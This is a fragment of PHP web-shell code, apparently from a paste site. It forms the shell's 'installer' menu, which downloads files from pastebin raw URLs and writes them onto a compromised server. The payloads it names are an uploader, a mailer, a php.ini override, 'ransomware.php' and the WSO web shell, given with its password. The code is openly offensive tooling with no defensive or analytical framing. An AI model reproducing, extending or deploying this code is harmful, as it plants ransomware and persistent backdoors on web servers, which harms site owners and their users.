- mtr('?'.x5.$dir);
- } else {
- error('Failed !!');
- }
- }
- if($_COEG['op']=="3") {
- if(op('php.ini', 'https://pastebin.com/raw/gnbXUciS')) {
- success('Done !!');
- mtr('?'.x5.$dir);
- } else {
- error('Failed !!');
- }
- }
- if($_COEG['op']=="5") {
- if(op('ransomware.php', 'https://pastebin.com/raw/CZMeawF0')) {
- success('Done !!');
- mtr('?'.x5.$dir);
- } else {
- error('Failed !!');
- }
- }
- if($_COEG['op']=="6") {
- if(op('wso.php', 'https://pastebin.com/raw/1GeZGycM')) {
- success('Done !!');
- mtr('?'.x5.$dir);
- } else {
- error('Failed !!');
- }
- }
- vars('<div class="tools-content top" style="padding:5px">');
- vars('<table>
- <form action="?'.x5.$dir.'" method="POST"><td align="center" style="width:10%"><i class="fa fa-download"></span></td>
- <td style="width:70%"><select name="op" id="c">');
- vars('<option value=""> -- INSTALLER --</option>');
- vars('<option value="1">uploader.php</option>');
- vars('<option value="2">mailler.php</option>');
- vars('<option value="3">php.ini</option>');
- vars('<option value="5">ransomware.php</option>');
- vars('<option value="6">wso.php [ pass : brtz07 ]</option>');
- vars('</select></td>
- <td style="width:20%;text-align:right"><button onmousedown="bleep.play();" type="submit" class="btn-exe" onclick="create();return false;"><i class="fa fa-arrow-circle-right"></i></button></form></td></table>
- </div>');
- //-- THANKS ALL --//
- ?>
Add Comment
Please, Sign In to add comment
